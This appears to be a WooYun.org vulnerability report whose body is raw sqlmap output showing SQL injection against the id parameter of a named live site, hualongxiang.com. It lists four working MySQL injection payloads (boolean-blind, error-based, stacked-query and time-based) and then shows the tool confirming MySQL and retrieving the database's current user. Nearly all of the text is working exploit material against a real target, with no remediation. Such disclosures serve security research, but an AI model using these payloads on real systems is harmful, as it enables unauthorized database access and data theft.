WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
 clause
    Payload: http://m.f.hualongxiang.com:80/view/index/id/2022692 RLIKE (SELECT
(CASE WHEN (1876=1876) THEN 2022692 ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: http://m.f.hualongxiang.com:80/view/index/id/2022692 AND (SELECT 33
38 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(3338=3338,1))),0x717a7a
7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: http://m.f.hualongxiang.com:80/view/index/id/2022692;(SELECT * FROM
 (SELECT(SLEEP(5)))rbkG)#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://m.f.hualongxiang.com:80/view/index/id/2022692 AND (SELECT *
FROM (SELECT(SLEEP(5)))nNXK)
---
[14:22:50] [INFO] testing MySQL
[14:22:50] [INFO] confirming MySQL
[14:22:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[14:22:50] [INFO] fetching current user
[14:22:50] [INFO] retrieved: [email protected]
current user:    '[email protected]'